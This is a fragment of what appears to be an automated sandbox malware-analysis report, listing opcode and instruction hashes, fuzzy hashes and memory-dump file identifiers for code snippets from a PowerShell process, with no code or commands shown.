                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87e2ac53d21909e9c1acd4e8b1d5c689bf54e874c4431f10b567dd931d7a22be
                                                                                                                        • Instruction ID: 69e1eb4f0dcf815c5ead3a4b1139cf30096c428322172cfe017b905d1c7d2161
                                                                                                                        • Opcode Fuzzy Hash: 87e2ac53d21909e9c1acd4e8b1d5c689bf54e874c4431f10b567dd931d7a22be
                                                                                                                        • Instruction Fuzzy Hash: A0E065367002189BCB15566DD8144EE77ABEBC8212B05417AD906E7340DF759D06C791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ae9b9f16fdae2a107664d215b24480577d15b63e89c70c25146648c4f176577a
                                                                                                                        • Instruction ID: 891b6a68f96ec5fc24a19a45df9a683715dcdf9f427b3fd2aecc2dbfb7cde7fa
                                                                                                                        • Opcode Fuzzy Hash: ae9b9f16fdae2a107664d215b24480577d15b63e89c70c25146648c4f176577a
                                                                                                                        • Instruction Fuzzy Hash: F6F0BC3211025EABCF02AF98D901CEA3FA6FF0C354B449505FA4456120C676E961AB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a7668840499b6591272f89cb75885c3cbd1d3653bd3d30bd5fc074f5b81729e0
                                                                                                                        • Instruction ID: 06a6e7894c4a3b563f98d7b26f428ce6ca195edbde20a608ec7e71d135601c4d
                                                                                                                        • Opcode Fuzzy Hash: a7668840499b6591272f89cb75885c3cbd1d3653bd3d30bd5fc074f5b81729e0
                                                                                                                        • Instruction Fuzzy Hash: 51E02631A082146FDB15D7A8A8556EA7F77FB41030F1482AFE405D3241EB3945078B40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.279723641.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_8420000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 75a3a054aac06954a4409b8e7f388c09c077635abb0fdd39f7ef601a936a77ba
                                                                                                                        • Instruction ID: 46f15425739d5035c47f180708cdc32937f1c238adcb71f9cac478925ba4acb8
                                                                                                                        • Opcode Fuzzy Hash: 75a3a054aac06954a4409b8e7f388c09c077635abb0fdd39f7ef601a936a77ba
                                                                                                                        • Instruction Fuzzy Hash: 6ED05B31A04219ABCB15DB5994454DE7FBAFB44171B15416AE405D2240FF3595428780
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%